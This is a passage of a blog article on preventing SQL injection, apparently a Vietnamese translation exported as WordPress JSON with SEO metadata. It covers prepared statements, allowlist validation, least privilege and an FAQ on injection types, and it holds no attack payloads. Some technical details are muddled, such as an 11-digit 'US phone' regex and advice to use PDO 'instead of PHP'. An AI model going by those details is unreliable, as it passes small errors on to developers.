C\u00e1c c\u00e2u l\u1ec7nh chu\u1ea9n b\u1ecb s\u1eb5n gi\u00fap \u0111\u1ea3m b\u1ea3o r\u1eb1ng m\u1ee5c ti\u00eau c\u1ee7a m\u1ed9t truy v\u1ea5n kh\u00f4ng b\u1ecb thay \u0111\u1ed5i, ngay c\u1ea3 khi ai \u0111\u00f3 c\u1ed1 g\u1eafng \u0111\u01b0a ra c\u00e1c ch\u1ec9 d\u1eabn SQL.<\/p>\n\n\n
2) X\u00e1c th\u1ef1c \u0111\u1ea7u v\u00e0o danh s\u00e1ch cho ph\u00e9p<\/h3>\n\n\n
C\u00e1c truy v\u1ea5n SQL s\u1eed d\u1ee5ng c\u00e1c bi\u1ebfn li\u00ean k\u1ebft \u1edf c\u00e1c v\u1ecb tr\u00ed c\u1ee5 th\u1ec3 cho d\u1eef li\u1ec7u. V\u00ed d\u1ee5, n\u1ebfu b\u1ea1n \u0111ang s\u1eed d\u1ee5ng Python, b\u1ea1n s\u1ebd s\u1eed d\u1ee5ng %s<\/strong> ch\u1ed7 tr\u1ed1ng. B\u1ea1n c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng m\u1ed9t bi\u1ec3u th\u1ee9c ch\u00ednh quy \u0111\u1ec3 x\u00e1c th\u1ef1c \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng so v\u1edbi danh s\u00e1ch cho ph\u00e9p cho c\u00e1c k\u00fd t\u1ef1 n\u00e0o \u0111\u01b0\u1ee3c ph\u00e9p trong t\u1eebng bi\u1ebfn li\u00ean k\u1ebft.<\/p>\n\n\n\n
N\u1ebfu b\u1ea1n \u0111ang s\u1eed d\u1ee5ng JavaScript, b\u1ea1n c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng \\w<\/strong> \u0111\u1ec3 kh\u1edbp c\u00e1c k\u00fd t\u1ef1 ch\u1eef v\u00e0 s\u1ed1 v\u00e0 d\u1ea5u g\u1ea1ch d\u01b0\u1edbi.<\/p>\n\n\n\n
Danh s\u00e1ch cho ph\u00e9p n\u00ean c\u1ee5 th\u1ec3 nh\u1ea5t c\u00f3 th\u1ec3 \u0111\u1ec3 tr\u00e1nh c\u00e1c k\u1ebft qu\u1ea3 d\u01b0\u01a1ng t\u00ednh gi\u1ea3.<\/p>\n\n\n\n
V\u00ed d\u1ee5, n\u1ebfu b\u1ea1n \u0111ang t\u00ecm ki\u1ebfm m\u1ed9t s\u1ed1 \u0111i\u1ec7n tho\u1ea1i Hoa K\u1ef3, b\u1ea1n s\u1ebd s\u1eed d\u1ee5ng bi\u1ec3u th\u1ee9c ch\u00ednh quy sau:<\/p>\n\n\n\n
\/^\\d{11}$\/<\/pre>\n\n\n\n
\u0110i\u1ec1u n\u00e0y s\u1ebd kh\u1edbp v\u1edbi m\u1ed9t chu\u1ed7i g\u1ed3m 11 ch\u1eef s\u1ed1 c\u00f3 th\u1ec3 l\u00e0 m\u1ed9t s\u1ed1 \u0111i\u1ec7n tho\u1ea1i. N\u1ebfu ai \u0111\u00f3 c\u1ed1 g\u1eafng g\u1eedi m\u1ed9t c\u00e1i g\u00ec \u0111\u00f3 nh\u01b0 \u2018abcdef<\/strong>\u2018, n\u00f3 s\u1ebd kh\u00f4ng kh\u1edbp v\u00e0 \u0111\u1ea7u v\u00e0o s\u1ebd kh\u00f4ng h\u1ee3p l\u1ec7.<\/p>\n\n\n\n
\u0110i\u1ec1u n\u00e0y s\u1ebd gi\u00fap \u0111\u1ea3m b\u1ea3o d\u1eef li\u1ec7u c\u1ee7a b\u1ea1n an to\u00e0n v\u00e0 b\u1ea3o m\u1eadt. N\u1ebfu b\u1ea1n c\u1ea7n s\u1eed d\u1ee5ng c\u00e1c gi\u00e1 tr\u1ecb t\u1eeb m\u00e3 thay v\u00ec c\u00e1c tham s\u1ed1 ng\u01b0\u1eddi d\u00f9ng, \u0111i\u1ec1u \u0111\u00f3 c\u0169ng kh\u00f4ng sao!<\/p>\n\n\n\n
Tuy nhi\u00ean, gi\u1ea3 s\u1eed c\u00e1c gi\u00e1 tr\u1ecb tham s\u1ed1 ng\u01b0\u1eddi d\u00f9ng nh\u1eafm m\u1ee5c ti\u00eau \u0111\u1ebfn c\u00e1c t\u00ean b\u1ea3ng v\u00e0 c\u1ed9t c\u1ee5 th\u1ec3. Trong tr\u01b0\u1eddng h\u1ee3p \u0111\u00f3, c\u00e1c gi\u00e1 tr\u1ecb tham s\u1ed1 n\u00ean \u0111\u01b0\u1ee3c \u00e1nh x\u1ea1 t\u1edbi c\u00e1c t\u00ean b\u1ea3ng v\u00e0 c\u1ed9t t\u01b0\u01a1ng \u1ee9ng \u0111\u1ec3 \u0111\u1ea3m b\u1ea3o r\u1eb1ng \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng kh\u00f4ng \u0111\u01b0\u1ee3c x\u00e1c th\u1ef1c kh\u00f4ng \u0111i v\u00e0o truy v\u1ea5n.<\/p>\n\n\n
3) S\u1eed d\u1ee5ng danh s\u00e1ch tr\u1eafng<\/h3>\n\n\n
\u0110\u1eebng l\u1ecdc \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng d\u1ef1a tr\u00ean danh s\u00e1ch \u0111en c\u1ee7a c\u00e1c k\u00fd t\u1ef1 x\u1ea5u. S\u1eed d\u1ee5ng danh s\u00e1ch cho ph\u00e9p c\u00e1c k\u00fd t\u1ef1 t\u1ed1t \u0111\u01b0\u1ee3c mong \u0111\u1ee3i trong c\u00e1c tr\u01b0\u1eddng c\u1ee5 th\u1ec3 hi\u1ec7u qu\u1ea3 h\u01a1n nhi\u1ec1u. \u0110i\u1ec1u n\u00e0y s\u1ebd ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng SQL injection tr\u01b0\u1edbc khi ch\u00fang b\u1eaft \u0111\u1ea7u.<\/p>\n\n\n\n
V\u00ed d\u1ee5, ch\u1ec9 cho ph\u00e9p c\u00e1c ch\u1eef s\u1ed1 v\u00e0 d\u1ea5u g\u1ea1ch ngang trong tr\u01b0\u1eddng \u0111\u1ea7u v\u00e0o n\u1ebfu b\u1ea1n mong \u0111\u1ee3i m\u1ed9t s\u1ed1 \u0111i\u1ec7n tho\u1ea1i. N\u1ebfu b\u1ea1n \u0111ang mong \u0111\u1ee3i m\u1ed9t \u0111\u1ecba ch\u1ec9 email, ch\u1ec9 cho ph\u00e9p c\u00e1c k\u00fd t\u1ef1 h\u1ee3p l\u1ec7 trong m\u1ed9t \u0111\u1ecba ch\u1ec9 email.<\/p>\n\n\n
4) S\u1eed d\u1ee5ng c\u00e1c n\u1ec1n t\u1ea3ng m\u1edbi nh\u1ea5t<\/h3>\n\n\n
PHP kh\u00f4ng c\u00f3 b\u1ea3o v\u1ec7 SQLi trong c\u00e1c n\u1ec1n t\u1ea3ng ph\u00e1t tri\u1ec3n web c\u0169 h\u01a1n. S\u1eed d\u1ee5ng phi\u00ean b\u1ea3n m\u1edbi nh\u1ea5t c\u1ee7a m\u00f4i tr\u01b0\u1eddng l\u1eadp tr\u00ecnh, ng\u00f4n ng\u1eef v\u00e0 c\u00e1c c\u00f4ng ngh\u1ec7 li\u00ean quan c\u00f3 s\u1eb5n. Thay v\u00ec PHP, h\u00e3y s\u1eed d\u1ee5ng PDO trong v\u00ed d\u1ee5 n\u00e0y.<\/p>\n\n\n
5) Qu\u00e9t \u1ee9ng d\u1ee5ng web c\u1ee7a b\u1ea1n th\u01b0\u1eddng xuy\u00ean<\/h3>\n\n\n
SQL injections c\u00f3 th\u1ec3 r\u1ea5t kh\u00f3 ph\u00e1t hi\u1ec7n. \u0110i\u1ec1u quan tr\u1ecdng l\u00e0 qu\u00e9t \u1ee9ng d\u1ee5ng web c\u1ee7a b\u1ea1n \u0111\u1ec3 t\u00ecm c\u00e1c l\u1ed7 h\u1ed5ng th\u01b0\u1eddng xuy\u00ean.<\/p>\n\n\n
6) Th\u1ef1c thi nguy\u00ean t\u1eafc quy\u1ec1n t\u1ed1i thi\u1ec3u<\/h3>\n\n\n
Nguy\u00ean t\u1eafc quy\u1ec1n t\u1ed1i thi\u1ec3u l\u00e0 m\u1ed9t kh\u00e1i ni\u1ec7m b\u1ea3o m\u1eadt h\u1ea1n ch\u1ebf ng\u01b0\u1eddi d\u00f9ng ch\u1ec9 c\u00f3 quy\u1ec1n truy c\u1eadp t\u1ed1i thi\u1ec3u c\u1ea7n thi\u1ebft \u0111\u1ec3 th\u1ef1c hi\u1ec7n c\u00f4ng vi\u1ec7c c\u1ee7a h\u1ecd. \u0110i\u1ec1u n\u00e0y bao g\u1ed3m vi\u1ec7c h\u1ea1n ch\u1ebf s\u1ed1 l\u01b0\u1ee3ng t\u00e0i kho\u1ea3n m\u00e0 ng\u01b0\u1eddi d\u00f9ng c\u00f3 v\u00e0 c\u00e1c quy\u1ec1n m\u00e0 c\u00e1c t\u00e0i kho\u1ea3n \u0111\u00f3 c\u00f3.<\/p>\n\n\n\n
H\u1ea1n ch\u1ebf t\u1ed1i thi\u1ec3u v\u1ec1 ch\u1ee9c n\u0103ng (LRF) l\u00e0 th\u1ef1c h\u00e0nh v\u00e0 kh\u00e1i ni\u1ec7m h\u1ea1n ch\u1ebf quy\u1ec1n c\u1ee7a ng\u01b0\u1eddi d\u00f9ng, t\u00e0i kho\u1ea3n v\u00e0 quy tr\u00ecnh t\u00ednh to\u00e1n ch\u1ec9 \u0111\u1ed1i v\u1edbi nh\u1eefng t\u00e0i nguy\u00ean c\u1ea7n thi\u1ebft cho c\u00e1c nhi\u1ec7m v\u1ee5 c\u01a1 b\u1ea3n, ch\u1ea5p nh\u1eadn \u0111\u01b0\u1ee3c. \u0110i\u1ec1u n\u00e0y gi\u00fap duy tr\u00ec quy\u1ec1n ho\u1eb7c m\u1ee9c \u0111\u1ed9 truy c\u1eadp t\u1ed1i thi\u1ec3u c\u1ee7a ng\u01b0\u1eddi d\u00f9ng, \u0111i\u1ec1u n\u00e0y r\u1ea5t quan tr\u1ecdng \u0111\u1ec3 m\u1ecdi ng\u01b0\u1eddi th\u1ef1c hi\u1ec7n c\u00f4ng vi\u1ec7c c\u1ee7a h\u1ecd hi\u1ec7u qu\u1ea3.<\/p>\n\n\n\n
Quy\u1ec1n t\u1ed1i thi\u1ec3u l\u00e0 m\u1ed9t nguy\u00ean t\u1eafc b\u1ea3o m\u1eadt y\u00eau c\u1ea7u c\u00e1c \u1ee9ng d\u1ee5ng, h\u1ec7 th\u1ed1ng v\u00e0 thi\u1ebft b\u1ecb ch\u1ec9 c\u00f3 c\u00e1c quy\u1ec1n c\u1ea7n thi\u1ebft \u0111\u1ec3 ho\u00e0n th\u00e0nh m\u1ed9t nhi\u1ec7m v\u1ee5 c\u1ee5 th\u1ec3. B\u1eb1ng c\u00e1ch n\u00e0y, t\u00e1c \u0111\u1ed9ng s\u1ebd b\u1ecb gi\u1edbi h\u1ea1n n\u1ebfu ai \u0111\u00f3 qu\u1ea3n l\u00fd \u0111\u1ec3 khai th\u00e1c m\u1ed9t l\u1ed7 h\u1ed5ng v\u00e0 g\u00e2y thi\u1ec7t h\u1ea1i. \u0110i\u1ec1u n\u00e0y tr\u00e1i ng\u01b0\u1ee3c v\u1edbi vi\u1ec7c cho ng\u01b0\u1eddi d\u00f9ng nhi\u1ec1u quy\u1ec1n h\u01a1n h\u1ecd c\u1ea7n, \u0111i\u1ec1u n\u00e0y l\u00e0m t\u0103ng nguy c\u01a1 g\u00e2y h\u1ea1i \u0111\u00e1ng k\u1ec3 trong m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng SQL.<\/p>\n\n\n
SQL Injection \u2013 C\u00e2u h\u1ecfi th\u01b0\u1eddng g\u1eb7p<\/strong><\/h2>\n\n\n
\u00a0<\/div><\/div>\n\n\n\n
\n
SQL injection ph\u1ed5 bi\u1ebfn nh\u1ea5t l\u00e0 g\u00ec?<\/strong>\n
In-band SQL injection l\u00e0 lo\u1ea1i t\u1ea5n c\u00f4ng SQL injection ph\u1ed5 bi\u1ebfn nh\u1ea5t. N\u00f3 x\u1ea3y ra khi k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng c\u00f9ng m\u1ed9t k\u00eanh truy\u1ec1n th\u00f4ng \u0111\u1ec3 g\u1eedi payload v\u00e0 thu th\u1eadp k\u1ebft qu\u1ea3.<\/p>\n<\/div>\n
Ph\u00f2ng th\u1ee7 t\u1ed1t nh\u1ea5t ch\u1ed1ng l\u1ea1i SQL injection l\u00e0 g\u00ec?<\/strong>\n
Ph\u00f2ng th\u1ee7 t\u1ed1t nh\u1ea5t ch\u1ed1ng l\u1ea1i SQL injection l\u00e0 s\u1eed d\u1ee5ng truy v\u1ea5n c\u00f3 tham s\u1ed1. Lo\u1ea1i truy v\u1ea5n n\u00e0y s\u1eed d\u1ee5ng c\u00e1c gi\u00e1 tr\u1ecb ch\u1ed7 tr\u1ed1ng cho c\u00e1c tham s\u1ed1, \u0111\u01b0\u1ee3c cung c\u1ea5p v\u00e0o m\u1ed9t ng\u00e0y sau \u0111\u00f3. Ph\u01b0\u01a1ng ph\u00e1p n\u00e0y cho ph\u00e9p c\u01a1 s\u1edf d\u1eef li\u1ec7u x\u00e1c \u0111\u1ecbnh gi\u1eefa m\u00e3 ngu\u1ed3n v\u00e0 th\u00f4ng tin.<\/p>\n<\/div>\n
SQL injection \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n nh\u01b0 th\u1ebf n\u00e0o?<\/strong>\n
SQL injection c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n theo nhi\u1ec1u c\u00e1ch. M\u1ed9t ph\u01b0\u01a1ng ph\u00e1p l\u00e0 s\u1eed d\u1ee5ng t\u01b0\u1eddng l\u1eeda \u1ee9ng d\u1ee5ng web (WAF). WAF l\u00e0 m\u1ed9t ph\u1ea7n c\u1ee9ng ho\u1eb7c ph\u1ea7n m\u1ec1m n\u1eb1m gi\u1eefa m\u1ed9t \u1ee9ng d\u1ee5ng web v\u00e0 internet. N\u00f3 ki\u1ec3m tra l\u01b0u l\u01b0\u1ee3ng truy c\u1eadp \u0111\u1ec3 t\u00ecm ho\u1ea1t \u0111\u1ed9ng \u0111\u1ed9c h\u1ea1i v\u00e0 c\u00f3 th\u1ec3 ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng SQL injection.<\/p>\n<\/div>\n
SQL injection th\u1ee9 c\u1ea5p l\u00e0 g\u00ec?<\/strong>\n
SQL injection th\u1ee9 c\u1ea5p x\u1ea3y ra khi k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 ti\u00eam m\u1ed9t payload \u0111\u01b0\u1ee3c l\u01b0u tr\u1eef b\u1edfi \u1ee9ng d\u1ee5ng web v\u00e0 sau \u0111\u00f3 \u0111\u01b0\u1ee3c th\u1ef1c thi sau \u0111\u00f3. Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 \u0111\u1ea1t \u0111\u01b0\u1ee3c h\u01a1n v\u00ec k\u1ebb t\u1ea5n c\u00f4ng ph\u1ea3i c\u00f3 c\u00e1ch k\u00edch ho\u1ea1t vi\u1ec7c th\u1ef1c thi payload \u0111\u01b0\u1ee3c l\u01b0u tr\u1eef.<\/p>\n<\/div>\n
Blind SQL injection l\u00e0 g\u00ec?<\/strong>\n
Blind SQL injection l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng kh\u00f4ng tr\u1ef1c ti\u1ebfp th\u1ea5y k\u1ebft qu\u1ea3 c\u1ee7a payload c\u1ee7a h\u1ecd. Thay v\u00e0o \u0111\u00f3, h\u1ecd ph\u1ea3i s\u1eed d\u1ee5ng c\u00e1c c\u00e2u l\u1ec7nh \u0111\u00fang ho\u1eb7c sai \u0111\u1ec3 suy lu\u1eadn th\u00f4ng tin t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 th\u1ef1c hi\u1ec7n h\u01a1n nh\u01b0ng c\u00f3 th\u1ec3 nguy hi\u1ec3m nh\u01b0 c\u00e1c lo\u1ea1i SQL injection kh\u00e1c.<\/p>\n<\/div>\n
Truy v\u1ea5n x\u1ebfp ch\u1ed3ng l\u00e0 g\u00ec?<\/strong>\n
Truy v\u1ea5n x\u1ebfp ch\u1ed3ng l\u00e0 m\u1ed9t lo\u1ea1i SQL injection m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng nhi\u1ec1u truy v\u1ea5n \u0111\u1ec3 tr\u00edch xu\u1ea5t th\u00f4ng tin t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. Lo\u1ea1i t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 th\u1ef1c hi\u1ec7n h\u01a1n nh\u01b0ng c\u00f3 th\u1ec3 r\u1ea5t nguy hi\u1ec3m n\u1ebfu th\u00e0nh c\u00f4ng.<\/p>\n<\/div>\n
SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 g\u00ec?<\/strong>\n
SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00e1c l\u1ed7i c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u1ec3 suy lu\u1eadn th\u00f4ng tin t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u. Cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y kh\u00f3 th\u1ef1c hi\u1ec7n h\u01a1n nh\u01b0ng c\u00f3 th\u1ec3 r\u1ea5t nguy hi\u1ec3m n\u1ebfu th\u00e0nh c\u00f4ng.<\/p>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"
SQL injection l\u00e0 g\u00ec? SQL injection (SQLi) l\u00e0 m\u1ed9t lo\u1ea1i t\u1ea5n c\u00f4ng cho ph\u00e9p t\u1ed9i ph\u1ea1m th\u1ef1c thi c\u00e1c c\u00e2u l\u1ec7nh SQL \u0111\u1ed9c h\u1ea1i \u0111\u1ed1i v\u1edbi c\u00e1c \u1ee9ng d\u1ee5ng web d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng. K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 truy c\u1eadp d\u1eef li\u1ec7u nh\u1ea1y c\u1ea3m, ch\u1eb3ng h\u1ea1n nh\u01b0\u2026 Ti\u1ebfp t\u1ee5c \u0111\u1ecdc SQL Injection 101: SQLi l\u00e0 g\u00ec v\u00e0 c\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":644,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[],"class_list":["post-505","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","entry"],"yoast_head":"\nWhat is SQLi and How to Prevent Attacks | securitybriefing<\/title>\n<meta name=\"description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What is SQLi and How to Prevent Attacks | securitybriefing\" \/>\n<meta property=\"og:description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/\" \/>\n<meta property=\"og:site_name\" content=\"Security Briefing\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-06T22:53:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\" \/>\n\t<meta property=\"og:image:width\" content=\"558\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"security\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" content=\"security\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 ph\u00fat\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"author\":{\"name\":\"security\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\"},\"headline\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"wordCount\":2130,\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"articleSection\":[\"Security\"],\"inLanguage\":\"vi\"},{\"@type\":[\"WebPage\",\"FAQPage\"],\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"name\":\"What is SQLi and How to Prevent Attacks | securitybriefing\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"description\":\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\",\"breadcrumb\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\"},\"mainEntity\":[{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\"}],\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"width\":558,\"height\":500,\"caption\":\"sql injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/securitybriefing.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/securitybriefing.net\/#website\",\"url\":\"https:\/\/securitybriefing.net\/\",\"name\":\"Security Briefing\",\"description\":\"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.\",\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/securitybriefing.net\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"vi\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/securitybriefing.net\/#organization\",\"name\":\"Security Briefing\",\"url\":\"https:\/\/securitybriefing.net\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"width\":256,\"height\":70,\"caption\":\"Security Briefing\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\",\"name\":\"security\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"vi\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g\",\"caption\":\"security\"},\"description\":\"admin is a senior staff writer for Government Technology. She previously wrote for PYMNTS and The Bay State Banner, and holds a B.A. in creative writing from Carnegie Mellon. She\u2019s based outside Boston.\",\"sameAs\":[\"http:\/\/securitybriefing.net\"],\"url\":\"https:\/\/securitybriefing.net\/vi\/author\/security\/\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"position\":1,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\",\"name\":\"What is the most common SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker can use the same communication channel to deliver the payload and gather results.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"position\":2,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\",\"name\":\"What is the best defense of SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"position\":3,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\",\"name\":\"How is SQL injection 